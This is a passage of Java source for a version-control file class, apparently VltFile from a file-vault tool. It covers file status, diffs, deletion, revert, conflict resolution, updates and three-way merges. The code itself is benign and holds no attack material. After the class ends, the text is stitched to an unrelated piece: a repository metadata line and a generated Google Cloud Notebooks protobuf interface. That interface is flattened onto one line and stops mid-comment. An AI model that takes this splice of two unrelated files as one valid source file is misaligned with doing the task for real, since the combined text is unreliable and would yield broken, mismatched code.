                            VltEntryInfo base = entry.base();
                            assert work != null;
                            assert base != null;
                            try {
                                // refresh size/date (not a forced checksum) before comparing
                                work.update(file, false);
                            } catch (IOException e) {
                                throw exception("Error while calculating status.", e);
                            }
                            state = work.isSame(base) ? State.CLEAN : State.MODIFIED;
                        }
                    } else {
                        state = State.MISSING;
                    }
                    break;
                case ADDED:
                    if (file.exists()) {
                        state = State.ADDED;
                    } else {
                        state = State.MISSING;
                    }
                    break;
                case CONFLICT:
                    state = State.CONFLICTED;
                    break;
                case DELETED:
                    state = State.DELETED;
                    break;
            }
        }
        return state;
    }

    /** @return the file name relative to its directory */
    public String getName() {
        return name;
    }

    /** @return the underlying file on disk (may not exist) */
    public File getFile() {
        return file;
    }

    /** @return the platform path of the underlying file */
    public String getPath() {
        return file.getPath();
    }

    /**
     * Returns the meta "base" file (the pristine copy) for this file.
     *
     * @param create if {@code true} the base file is created when absent
     * @throws VltException if the meta directory cannot be accessed
     */
    public MetaFile getBaseFile(boolean create) throws VltException {
        try {
            return parent.getMetaDirectory().getBaseFile(name, create);
        } catch (IOException e) {
            throw new VltException(getPath(), "Error opening base file.", e);
        }
    }

    /**
     * Returns the content type recorded in the work entry, or {@code null} for
     * directories and uncontrolled files.
     */
    public String getContentType() {
        if (entry != null && !file.isDirectory()) {
            VltEntryInfo work = entry.work();
            if (work != null) {
                return work.getContentType();
            }
        }
        return null;
    }

    /**
     * Checks if this file has binary content. It does not actually read the
     * file data but calls {@link MimeTypes#isBinary(String)} with the content
     * type of the work file.
     *
     * @return {@code true} if this is binary
     */
    public boolean isBinary() {
        return MimeTypes.isBinary(getContentType());
    }

    /**
     * Returns (and creates if needed) the meta "tmp" file used as scratch space
     * for remote copies during merge/update.
     *
     * @throws VltException if the meta directory cannot be accessed
     */
    public MetaFile getTmpFile() throws VltException {
        try {
            return parent.getMetaDirectory().getTmpFile(name, true);
        } catch (IOException e) {
            throw new VltException(getPath(), "Error opening tmp file.", e);
        }
    }

    /** @return {@code true} if this file is a directory and can be descended into */
    public boolean canDescend() {
        return file.isDirectory();
    }

    /**
     * Descends into this file as a {@link VltDirectory}.
     *
     * @throws VltException if this file is not a directory
     */
    public VltDirectory descend() throws VltException {
        if (!canDescend()) {
            throw new VltException("Cannot descend into non directory.");
        }
        return new VltDirectory(parent.getContext(), file);
    }

    /** @return the vlt entry, or {@code null} if not under version control */
    public VltEntry getEntry() {
        return entry;
    }

    /**
     * Writes a unified diff between the base file and the working file to the
     * context's stdout. Does nothing for directories, uncontrolled files, or
     * states without local changes; binary files get a placeholder message.
     *
     * @throws VltException if reading or writing fails
     */
    public void diff() throws VltException {
        State state = getStatus();
        if (entry == null || entry.isDirectory()) {
            return;
        }
        VltEntryInfo work = entry.work();
        VltEntryInfo base = entry.base();
        if (work == null || base == null) {
            return;
        }
        // only diff states that can actually differ from base
        switch (state) {
            case ADDED:
            case CONFLICTED:
            case DELETED:
            case MODIFIED:
                break;
            case IGNORED:
            case MISSING:
            case OBSTRUCTED:
            case REPLACED:
            case UNKNOWN:
            case VOID:
            case CLEAN:
                return;
        }
        if (MimeTypes.isBinary(work.getContentType()) || MimeTypes.isBinary(base.getContentType())) {
            PrintStream s = parent.getContext().getStdout();
            s.printf(Locale.ENGLISH, "Index: %s%n", getName());
            s.println("===================================================================");
            s.println("Cannot display: file marked as binary type.");
            s.printf(Locale.ENGLISH, "vlt:mime-type = %s%n", work.getContentType());
            s.flush();
            return;
        }
        try {
            // do the actual diff
            PrintStream s = parent.getContext().getStdout();
            DiffWriter out = new DiffWriter(new OutputStreamWriter(s, Constants.ENCODING));
            out.write("Index: ");
            out.write(getName());
            out.writeNewLine();
            out.write("===================================================================");
            out.writeNewLine();
            // r0/r1 may be null when base resp. work file is absent (added/deleted file)
            try (Reader r0 = getBaseFile(false) == null ? null : getBaseFile(false).getReader();
                 Reader r1 = file.exists()
                         ? new InputStreamReader(FileUtils.openInputStream(file), Constants.ENCODING)
                         : null) {
                Document d0 = new Document(this, LineElementsFactory.create(this, r0, false));
                Document d1 = new Document(this, LineElementsFactory.create(this, r1, false));
                DocumentDiff diff = d0.diff(d1);
                // 3 lines of context, like classic unified diff
                diff.write(out, 3);
            }
            out.flush();
        } catch (IOException e) {
            throw exception("Error while writing diff.", e);
        }
    }

    /**
     * Schedules this file for deletion. Locally modified or uncontrolled files
     * are only deleted when {@code force} is set; otherwise a message is printed
     * and {@link FileAction#VOID} is returned.
     *
     * @return {@link FileAction#DELETED} if the delete proceeded
     */
    public FileAction delete(boolean force) throws VltException {
        State state = getStatus();
        switch (state) {
            case ADDED:
            case CONFLICTED:
            case MODIFIED:
            case REPLACED:
                if (!force) {
                    parent.getContext().printMessage(this, "has local modification. use --force to delete anyway");
                    return FileAction.VOID;
                }
                break;
            case CLEAN:
            case MISSING:
            case DELETED:
                break;
            case IGNORED:
            case OBSTRUCTED:
            case UNKNOWN:
            case VOID:
                if (!force) {
                    parent.getContext().printMessage(this, "is not under version control. use --force to delete anyway");
                    return FileAction.VOID;
                }
                break;
        }
        if (entry != null && entry.delete(file)) {
            entry = null;
        }
        return FileAction.DELETED;
    }

    /**
     * Commits this file against the given remote: updates from the remote if it
     * exists, otherwise deletes locally.
     */
    public FileAction commit(VaultFile remoteFile) throws VltException {
        if (remoteFile == null) {
            return doDelete(false);
        } else {
            return doUpdate(remoteFile, false);
        }
    }

    /**
     * Reverts local changes back to the base copy.
     *
     * @return {@code true} if something was reverted
     */
    public boolean revert() throws VltException {
        State state = getStatus();
        switch (state) {
            case ADDED:
                doDelete(true);
                entry = null;
                return true;
            case CONFLICTED:
                // force-resolve first, then fall through to restore from base
                resolved(true);
                // no break;
            case DELETED:
            case MISSING:
            case MODIFIED:
                doRevert();
                return true;
            case IGNORED:
            case CLEAN:
            case OBSTRUCTED:
            case REPLACED:
            case UNKNOWN:
            case VOID:
            default:
                return false;
        }
    }

    /**
     * Marks a conflicted file as resolved. Unless {@code force} is set, the file
     * is first scanned for remaining 3-way conflict markers and the resolve is
     * refused if any are found.
     *
     * @return {@code true} if the file was resolved; {@code false} if it was not
     *         conflicted in the first place
     */
    public boolean resolved(boolean force) throws VltException {
        if (getStatus() != State.CONFLICTED) {
            return false;
        }
        if (!force) {
            // check if the file still contains the diff markers
            boolean mayContainMarker = false;
            try (InputStreamReader reader = new InputStreamReader(new FileInputStream(file), Constants.ENCODING);
                 BufferedReader in = new BufferedReader(reader)) {
                String line;
                while ((line = in.readLine()) != null) {
                    if (line.startsWith(Hunk3.MARKER_B[0])
                            || line.startsWith(Hunk3.MARKER_L[0])
                            || line.startsWith(Hunk3.MARKER_R[0])
                            || line.startsWith(Hunk3.MARKER_M[0])) {
                        mayContainMarker = true;
                        break;
                    }
                }
            } catch (IOException e) {
                throw exception("Error while reading file.", e);
            }
            if (mayContainMarker) {
                throw error("File still contains conflict markers. use --force to force resolve.");
            }
        }
        // resolve entry
        try {
            entry.resolved(getTmpFile(), file, getBaseFile(false));
        } catch (IOException e) {
            throw exception("Error while copying files.", e);
        }
        return true;
    }

    /**
     * Updates this file from the given remote file (which may be {@code null} if
     * the remote no longer exists). Dispatches on the current local state:
     * clean files are overwritten, modified files are merged, conflicts are
     * re-checked, deletions are propagated.
     *
     * @param remoteFile the remote counterpart, or {@code null} if deleted remotely
     * @param force      overwrite obstructed/unknown local files
     * @return the action that was performed
     * @throws VltException on I/O errors or non-forced collisions
     */
    public FileAction update(VaultFile remoteFile, boolean force) throws VltException {
        State state = getStatus();
        switch (state) {
            case IGNORED:
            case OBSTRUCTED:
            case REPLACED:
                if (!force || remoteFile == null) {
                    throw error("update not possible. file is " + state.name().toLowerCase(Locale.ROOT) + ". "
                            + "Specify --force to overwrite existing files.");
                }
                return doUpdate(remoteFile, false);
            case ADDED:
                if (remoteFile != null) {
                    if (mergeableWithRemote(remoteFile) != FileAction.VOID) {
                        throw error("Failed to add file: object of the same name already exists.");
                    }
                    return doUpdate(remoteFile, false);
                } else {
                    return FileAction.VOID;
                }
            case CLEAN:
                if (remoteFile == null) {
                    return doDelete(false);
                } else {
                    if (file.isDirectory()) {
                        // do nothing
                        return FileAction.VOID;
                    } else {
                        return doUpdate(remoteFile, false);
                    }
                }
            case CONFLICTED:
                if (remoteFile == null) {
                    try {
                        if (!entry.revertConflict(file)) {
                            return FileAction.CONFLICTED;
                        }
                    } catch (IOException e) {
                        throw exception("Error during update.", e);
                    }
                    // refetch status, and delete file if clean
                    return doDelete(getStatus() != State.CLEAN);
                } else {
                    try {
                        if (!entry.revertConflict(file)) {
                            return doMerge(remoteFile, FileAction.CONFLICTED);
                        } else {
                            return doMerge(remoteFile, FileAction.UPDATED);
                        }
                    } catch (IOException e) {
                        throw exception("Error during update.", e);
                    }
                }
            case DELETED:
                if (remoteFile == null) {
                    // we can delete the entry since someone else deleted it as well
                    return doDelete(false);
                } else {
                    // just update base and entry, in case someone wants to revert
                    return doUpdate(remoteFile, true);
                }
            case MISSING:
                if (remoteFile == null) {
                    // if file is missing, just delete it
                    return doDelete(false);
                } else {
                    // do update
                    entry = null;
                    return doUpdate(remoteFile, false);
                }
            case MODIFIED:
                if (remoteFile == null) {
                    // keep the file
                    return doDelete(true);
                } else {
                    return doMerge(remoteFile, FileAction.VOID);
                }
            case UNKNOWN:
                if (remoteFile == null) {
                    // do nothing
                    return FileAction.VOID;
                } else {
                    // do update
                    if (file.exists() && !force) {
                        throw error("Failed to update: object of the same name already exists."
                                + " Specify --force to overwrite existing files.");
                    }
                    return doUpdate(remoteFile, false);
                }
            case VOID:
                // do update
                return doUpdate(remoteFile, false);
            default:
                throw exception("illegal state: " + state, null);
        }
    }

    /**
     * Computes the action an update from {@code remoteFile} WOULD perform,
     * without changing anything locally (dry-run of {@link #update}).
     *
     * @param remoteFile the remote counterpart, or {@code null} if deleted remotely
     * @return the predicted action
     */
    public FileAction status(VaultFile remoteFile) throws VltException {
        State state = getStatus();
        switch (state) {
            case IGNORED:
            case OBSTRUCTED:
            case REPLACED:
                return FileAction.CONFLICTED;
            case ADDED:
                if (remoteFile != null) {
                    return FileAction.CONFLICTED;
                } else {
                    return FileAction.VOID;
                }
            case CLEAN:
                if (remoteFile == null) {
                    return FileAction.DELETED;
                } else {
                    if (file.isDirectory()) {
                        // do nothing
                        return FileAction.VOID;
                    } else {
                        return equalsToRemote(remoteFile) ? FileAction.VOID : FileAction.UPDATED;
                    }
                }
            case CONFLICTED:
                // do not probe further
                return FileAction.CONFLICTED;
            case DELETED:
                return FileAction.VOID;
            case MISSING:
                return FileAction.ADDED;
            case MODIFIED:
                if (remoteFile == null) {
                    return FileAction.DELETED;
                } else {
                    return mergeableWithRemote(remoteFile);
                }
            case UNKNOWN:
                if (remoteFile == null) {
                    // do nothing
                    return FileAction.VOID;
                } else {
                    return FileAction.UPDATED;
                }
            case VOID:
                return FileAction.ADDED;
            default:
                throw exception("illegal state: " + state, null);
        }
    }

    /**
     * Puts this file under version control (schedules an "add"). Only files in
     * state {@code UNKNOWN} or {@code VOID} are actually added; all other states
     * just print an informational message.
     *
     * @param force currently unused by the add path itself; passed through to {@link #doAdd}
     * @return {@link FileAction#ADDED} on success, otherwise {@link FileAction#VOID}
     */
    public FileAction add(boolean force) throws VltException {
        State state = getStatus();
        switch (state) {
            case ADDED:
            case CLEAN:
            case CONFLICTED:
            case MISSING:
            case MODIFIED:
            case OBSTRUCTED:
            case REPLACED:
                parent.getContext().printMessage(this, "is already under version control");
                break;
            case DELETED:
                parent.getContext().printMessage(this, "replace not supported yet");
                break;
            case IGNORED:
                parent.getContext().printMessage(this, "failed to add. is ignored.");
                break;
            case UNKNOWN:
            case VOID:
                return doAdd(force);
        }
        return FileAction.VOID;
    }

    /**
     * Performs the actual add: creates a fresh entry with a WORK info populated
     * from the file on disk and a content type guessed from the file name.
     * <p>
     * NOTE(review): the {@code force} parameter is currently ignored here — confirm
     * whether that is intentional.
     */
    private FileAction doAdd(boolean force) throws VltException {
        assert entry == null;
        entry = parent.getEntries().update(getName(), null, null);
        VltEntryInfo work = entry.create(VltEntryInfo.Type.WORK);
        try {
            work.update(file, true);
        } catch (IOException e) {
            throw exception("Error while adding file", e);
        }
        String contentType = MimeTypes.getMimeType(file.getName(), MimeTypes.APPLICATION_OCTET_STREAM);
        work.setContentType(contentType);
        entry.put(work);
        return FileAction.ADDED;
    }

    /**
     * Performs the actual delete: removes the meta base file (or un-controls the
     * directory), optionally deletes the working file, and drops the entry.
     *
     * @param keepFile if {@code true}, the working file itself is kept on disk
     */
    private FileAction doDelete(boolean keepFile) throws VltException {
        // small hack to remove meta directory. should actually be somewhere else
        if (file.isDirectory()) {
            VltDirectory dir = new VltDirectory(parent.getContext(), file);
            dir.uncontrol();
        } else {
            try {
                if (getBaseFile(false) != null) {
                    getBaseFile(false).delete();
                }
            } catch (IOException e) {
                throw new VltException(getPath(), "Error while deleting base file.", e);
            }
        }
        if (!keepFile) {
            // NOTE(review): File.delete() return value is ignored — a failed delete is silent
            file.delete();
        }
        entry = null;
        return FileAction.DELETED;
    }

    /**
     * 3-way merges the remote file into the locally modified working copy
     * (base vs. local vs. remote). On a clean merge the tmp copy becomes the new
     * base; on conflicts the entry is put into conflict state.
     *
     * @param remoteFile the remote file (must not be a directory)
     * @param action     the action to report when the merge applies cleanly;
     *                   {@link FileAction#CONFLICTED} short-circuits immediately
     * @return the resulting action (VOID / MERGED / CONFLICTED / the given action)
     */
    private FileAction doMerge(VaultFile remoteFile, FileAction action) throws VltException {
        if (remoteFile.isDirectory()) {
            throw exception("Error while merging. remote is a directory.", null);
        }
        // abort merger if actions is already conflict
        if (action == FileAction.CONFLICTED) {
            return action;
        }
        MetaFile baseFile = getBaseFile(false);
        MetaFile tmpFile = getTmpFile();
        VltEntryInfo base = entry.base();
        VltEntryInfo work = entry.work();
        // text files get native line endings during copy; binaries are copied verbatim
        byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType())
                ? null
                : LineOutputStream.LS_NATIVE;
        // get the remote file
        VaultFileCopy copy = null;
        boolean remoteUpdated = true;
        try {
            // first check size and last modified
            if (!base.checkModified(remoteFile)) {
                remoteUpdated = false;
            } else {
                File temp = tmpFile.openTempFile();
                copy = VaultFileCopy.copy(remoteFile, temp, lineFeed);
                // if tmp is equal to the base one, there was no update on the server
                if (copy.getMd5().equals(base.getMd5())) {
                    tmpFile.closeTempFile(tmpFile.length() >= 0);
                    remoteUpdated = false;
                } else {
                    tmpFile.closeTempFile(false);
                }
            }
        } catch (IOException e) {
            throw exception("Error while copying files.", e);
        }
        if (!remoteUpdated) {
            if (work.getMd5().equals(base.getMd5())) {
                // fix base
                base.setSize(work.getSize());
                base.setDate(work.getDate());
                return FileAction.VOID;
            } else if (remoteFile.lastModified() > 0) {
                // normal modification provided
                return action;
            }
        }
        try {
            // check if binary
            boolean remoteBT = getRemoteBinaryType(remoteFile, copy);
            boolean localBT = MimeTypes.isBinary(base.getContentType());
            if (remoteBT || localBT) {
                // binary content cannot be line-merged; flag a conflict instead
                parent.getContext().printMessage(this, "can't merge. binary content");
                entry.conflict(file, baseFile, tmpFile);
                return FileAction.CONFLICTED;
            }
            DocumentDiff3 diff;
            // do a 3-way diff between the base, the local and the remote one.
            // we currently do not use document sources, since we don't really have
            // a label to provide (like rev. num, etc).
            try (Reader r0 = baseFile.getReader();
                 Reader r1 = tmpFile.getReader()) {
                Document baseDoc = new Document(null,
                        LineElementsFactory.create(new MetaFileDocSource(baseFile), r0, false));
                Document leftDoc = new Document(null,
                        LineElementsFactory.create(new FileDocumentSource(file), false, Constants.ENCODING));
                Document rightDoc = new Document(null,
                        LineElementsFactory.create(new MetaFileDocSource(tmpFile), r1, false));
                diff = baseDoc.diff3(leftDoc, rightDoc);
            }
            // save the diff output
            try (Writer out = new OutputStreamWriter(FileUtils.openOutputStream(file), Constants.ENCODING)) {
                diff.write(new DiffWriter(out), false);
            }
            if (diff.hasConflicts()) {
                entry.conflict(file, baseFile, tmpFile);
                action = FileAction.CONFLICTED;
            } else {
                // make the tmp file the new base
                tmpFile.moveTo(baseFile);
                base.update(baseFile, true);
                action = FileAction.MERGED;
            }
            // and update the 'work'
            // check if MD5 changes and change action accordingly
            MD5 oldMd5 = work.getMd5();
            work.update(file, true);
            if (oldMd5.equals(work.getMd5())) {
                action = FileAction.VOID;
            }
            // check if remote file provided a last modified
            if (remoteFile.lastModified() == 0) {
                if (work.getMd5().equals(base.getMd5())) {
                    base.setDate(work.getDate());
                } else {
                    base.setDate(System.currentTimeMillis());
                }
            }
        } catch (IOException e) {
            throw exception("Error during merge operation.", e);
        }
        return action;
    }

    /**
     * Determines whether the remote file should be treated as binary. The
     * declared content type is cross-checked against the copied data; when the
     * two disagree, the data wins and a warning is printed.
     *
     * @param copy the copy result, or {@code null} if the remote was not copied
     */
    private boolean getRemoteBinaryType(VaultFile remoteFile, VaultFileCopy copy) {
        // check if binary
        boolean remoteBT = MimeTypes.isBinary(remoteFile.getContentType());
        if (copy != null && remoteBT != copy.isBinary()) {
            parent.getContext().printMessage(this,
                    "Remote Binary type differs from actual data. Content Type: "
                            + remoteFile.getContentType()
                            + " Data is binary: " + copy.isBinary()
                            + ". Using data type.");
            remoteBT = copy.isBinary();
        }
        return remoteBT;
    }

    /**
     * Dry-run check whether the remote file could be merged into the local one:
     * returns {@link FileAction#VOID} when remote equals base/work,
     * {@link FileAction#MERGED} when a 3-way merge would apply cleanly, and
     * {@link FileAction#CONFLICTED} otherwise (including binary content and
     * file/directory type mismatches).
     */
    private FileAction mergeableWithRemote(VaultFile remoteFile) throws VltException {
        if (remoteFile.isDirectory() != file.isDirectory()) {
            return FileAction.CONFLICTED;
        }
        if (file.isDirectory()) {
            return FileAction.VOID;
        }
        MetaFile tmpFile = getTmpFile();
        VltEntryInfo base = entry.base();
        // get the remote file
        byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType())
                ? null
                : LineOutputStream.LS_NATIVE;
        VaultFileCopy copy;
        try {
            File temp = tmpFile.openTempFile();
            copy = VaultFileCopy.copy(remoteFile, temp, lineFeed);
            if (base == null) {
                tmpFile.closeTempFile(true);
                // if base is null, file was only added so check the work entry
                VltEntryInfo work = entry.work();
                if (copy.getMd5().equals(work.getMd5())) {
                    return FileAction.VOID;
                } else {
                    return FileAction.CONFLICTED;
                }
            }
            // if tmp is equal to the base one, there was no update on the server
            if (copy.getMd5().equals(base.getMd5())) {
                tmpFile.closeTempFile(true);
                return FileAction.VOID;
            }
            // keep tmp file
            tmpFile.closeTempFile(false);
        } catch (IOException e) {
            throw exception("Error while copying files.", e);
        }
        // check if binary
        boolean remoteBT = getRemoteBinaryType(remoteFile, copy);
        if (remoteBT || MimeTypes.isBinary(base.getContentType())) {
            return FileAction.CONFLICTED;
        }
        MetaFile baseFile = getBaseFile(false);
        try (Reader r0 = baseFile.getReader();
             Reader r1 = tmpFile.getReader()) {
            // do a 3-way diff between the base, the local and the remote one.
            // we currently do not use document sources, since we don't really have
            // a label to provide (like rev. num, etc).
            Document baseDoc = new Document(null,
                    LineElementsFactory.create(new MetaFileDocSource(baseFile), r0, false));
            Document leftDoc = new Document(null,
                    LineElementsFactory.create(new FileDocumentSource(file), false, Constants.ENCODING));
            Document rightDoc = new Document(null,
                    LineElementsFactory.create(new MetaFileDocSource(tmpFile), r1, false));
            DocumentDiff3 diff = baseDoc.diff3(leftDoc, rightDoc);
            if (diff.hasConflicts()) {
                return FileAction.CONFLICTED;
            } else {
                return FileAction.MERGED;
            }
        } catch (IOException e) {
            throw exception("Error during merge operation.", e);
        }
    }

    /**
     * Restores the working file from the base copy (or recreates the directory)
     * and resets the WORK info to a copy of BASE.
     */
    private void doRevert() throws VltException {
        if (entry.isDirectory()) {
            // NOTE(review): File.mkdir() return value is ignored — a failed mkdir is silent
            file.mkdir();
        } else {
            try {
                getBaseFile(false).copyTo(getFile(), true);
            } catch (IOException e) {
                throw exception("Error while copying files.", e);
            }
        }
        VltEntryInfo base = entry.base();
        entry.put(base.copyAs(VltEntryInfo.Type.WORK));
    }

    /**
     * Copies the remote file into a temp file and compares its MD5 against the
     * base info.
     *
     * @return {@code true} if the remote content equals the base copy
     */
    private boolean equalsToRemote(VaultFile remoteFile) throws VltException {
        MetaFile tmpFile = getTmpFile();
        // copy file
        byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType())
                ? null
                : LineOutputStream.LS_NATIVE;
        VaultFileCopy copy;
        File temp = null;
        try {
            temp = tmpFile.openTempFile();
            copy = VaultFileCopy.copy(remoteFile, temp, lineFeed);
        } catch (IOException e) {
            throw exception("Error while copying files.", e);
        } finally {
            // NOTE(review): tmpFile cannot be null here (getTmpFile() throws instead);
            // the guard looks vestigial — confirm before removing
            if (tmpFile != null) {
                try {
                    tmpFile.closeTempFile(true);
                } catch (IOException e) {
                    // ignore
                }
            }
        }
        // if md5 is equal, no update
        VltEntryInfo base = entry.base();
        return copy.getMd5().equals(base.getMd5());
    }

    /**
     * Performs the actual update from the remote file: refreshes (or creates)
     * the BASE info and base file, and — unless {@code baseOnly} — also the
     * working file and WORK info. Directories are (re-)controlled as needed.
     *
     * @param remoteFile the remote file to update from (never {@code null} here)
     * @param baseOnly   if {@code true}, only the base copy/info is refreshed
     * @return ADDED, UPDATED or VOID depending on what actually changed
     */
    private FileAction doUpdate(VaultFile remoteFile, boolean baseOnly) throws VltException {
        FileAction action;
        VltEntryInfo base;
        if (entry == null || entry.base() == null) {
            // new entry
            action = FileAction.ADDED;
            entry = parent.getEntries().update(getName(), remoteFile.getAggregatePath(), remoteFile.getRepoRelPath());
            base = entry.create(VltEntryInfo.Type.BASE);
            entry.put(base);
        } else {
            action = FileAction.UPDATED;
            base = entry.base();
            // quick check if modified
            if (!base.checkModified(remoteFile)) {
                return FileAction.VOID;
            }
        }
        // a missing remote timestamp is replaced with "now"
        long lastMod = remoteFile.lastModified();
        if (lastMod == 0) {
            lastMod = System.currentTimeMillis();
        }
        base.setDate(lastMod);
        if (remoteFile.isDirectory()) {
            if (!baseOnly) {
                // ensure controlled
                // todo: this does not belong here
                if (entry.work() != null) {
                    action = FileAction.VOID;
                } else {
                    entry.put(base.copyAs(VltEntryInfo.Type.WORK));
                }
                // NOTE(review): mkdir()/setLastModified() return values are ignored
                file.mkdir();
                file.setLastModified(base.getDate());
                VltDirectory dir = new VltDirectory(parent.getContext(), file);
                if (!dir.isControlled()) {
                    dir.control(remoteFile.getPath(), remoteFile.getControllingAggregate().getPath());
                    action = FileAction.ADDED;
                }
            }
        } else {
            MetaFile baseFile = getBaseFile(true);
            // copy file
            byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType())
                    ? null
                    : LineOutputStream.LS_NATIVE;
            VaultFileCopy copy;
            try {
                File temp = baseFile.openTempFile();
                copy = VaultFileCopy.copy(remoteFile, temp, lineFeed);
                baseFile.closeTempFile(false);
            } catch (IOException e) {
                throw exception("Error while copying files.", e);
            }
            // if md5 is equal, no update
            if (copy.getMd5().equals(base.getMd5())) {
                action = FileAction.VOID;
            }
            // content-type change alone still counts as an update
            if (action == FileAction.VOID
                    && (base.getContentType() != null || remoteFile.getContentType() != null)
                    && (base.getContentType() == null
                        || !base.getContentType().equals(remoteFile.getContentType()))) {
                action = FileAction.UPDATED;
            }
            // update infos
            VltEntryInfo work = entry.work();
            base.setContentType(remoteFile.getContentType());
            base.setSize(copy.getLength());
            base.setMd5(copy.getMd5());
            if (!baseOnly) {
                // only copy if not equal
                if (work == null || !work.getMd5().equals(copy.getMd5()) || !getFile().exists()) {
                    try {
                        baseFile.copyTo(getFile(), true);
                        entry.put(base.copyAs(VltEntryInfo.Type.WORK));
                    } catch (IOException e) {
                        throw exception("Error while copying files.", e);
                    }
                }
            }
        }
        return action;
    }

    /** Wraps a throwable into a {@link VltException} carrying this file's path. */
    private VltException exception(String msg, Throwable cause) {
        return parent.getContext().exception(getPath(), msg, cause);
    }

    /** Creates a user-level {@link VltException} carrying this file's path. */
    private VltException error(String msg) {
        return parent.getContext().error(getPath(), msg);
    }

    //-----------------------------------------------------< DocumentSource >---

    /** {@inheritDoc} — the file name is used as the diff label. */
    public String getLabel() {
        return getName();
    }

    /** {@inheritDoc} — path relative to the context's current working directory. */
    public String getLocation() {
        File cwd = parent.getContext().getCwd();
        return PathUtil.getRelativeFilePath(cwd.getPath(), file.getPath());
    }
}
googleapis/google-cloud-java
35,534
java-notebooks/proto-google-cloud-notebooks-v1/src/main/java/com/google/cloud/notebooks/v1/InstanceOrBuilder.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/notebooks/v1/instance.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.notebooks.v1; public interface InstanceOrBuilder extends // @@protoc_insertion_point(interface_extends:google.cloud.notebooks.v1.Instance) com.google.protobuf.MessageOrBuilder { /** * * * <pre> * Output only. The name of this notebook instance. Format: * `projects/{project_id}/locations/{location}/instances/{instance_id}` * </pre> * * <code>string name = 1 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The name. */ java.lang.String getName(); /** * * * <pre> * Output only. The name of this notebook instance. Format: * `projects/{project_id}/locations/{location}/instances/{instance_id}` * </pre> * * <code>string name = 1 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The bytes for name. */ com.google.protobuf.ByteString getNameBytes(); /** * * * <pre> * Use a Compute Engine VM image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.VmImage vm_image = 2;</code> * * @return Whether the vmImage field is set. */ boolean hasVmImage(); /** * * * <pre> * Use a Compute Engine VM image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.VmImage vm_image = 2;</code> * * @return The vmImage. 
*/ com.google.cloud.notebooks.v1.VmImage getVmImage(); /** * * * <pre> * Use a Compute Engine VM image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.VmImage vm_image = 2;</code> */ com.google.cloud.notebooks.v1.VmImageOrBuilder getVmImageOrBuilder(); /** * * * <pre> * Use a container image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.ContainerImage container_image = 3;</code> * * @return Whether the containerImage field is set. */ boolean hasContainerImage(); /** * * * <pre> * Use a container image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.ContainerImage container_image = 3;</code> * * @return The containerImage. */ com.google.cloud.notebooks.v1.ContainerImage getContainerImage(); /** * * * <pre> * Use a container image to start the notebook instance. * </pre> * * <code>.google.cloud.notebooks.v1.ContainerImage container_image = 3;</code> */ com.google.cloud.notebooks.v1.ContainerImageOrBuilder getContainerImageOrBuilder(); /** * * * <pre> * Path to a Bash script that automatically runs after a notebook instance * fully boots up. The path must be a URL or * Cloud Storage path (`gs://path-to-file/file-name`). * </pre> * * <code>string post_startup_script = 4;</code> * * @return The postStartupScript. */ java.lang.String getPostStartupScript(); /** * * * <pre> * Path to a Bash script that automatically runs after a notebook instance * fully boots up. The path must be a URL or * Cloud Storage path (`gs://path-to-file/file-name`). * </pre> * * <code>string post_startup_script = 4;</code> * * @return The bytes for postStartupScript. */ com.google.protobuf.ByteString getPostStartupScriptBytes(); /** * * * <pre> * Output only. The proxy endpoint that is used to access the Jupyter notebook. * </pre> * * <code>string proxy_uri = 5 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The proxyUri. */ java.lang.String getProxyUri(); /** * * * <pre> * Output only. 
The proxy endpoint that is used to access the Jupyter notebook. * </pre> * * <code>string proxy_uri = 5 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The bytes for proxyUri. */ com.google.protobuf.ByteString getProxyUriBytes(); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return A list containing the instanceOwners. */ java.util.List<java.lang.String> getInstanceOwnersList(); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The count of instanceOwners. */ int getInstanceOwnersCount(); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. * </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @param index The index of the element to return. * @return The instanceOwners at the given index. */ java.lang.String getInstanceOwners(int index); /** * * * <pre> * Input only. The owner of this instance after creation. Format: `alias&#64;example.com` * * Currently supports one owner only. If not specified, all of the service * account users of your VM instance's service account can use * the instance. 
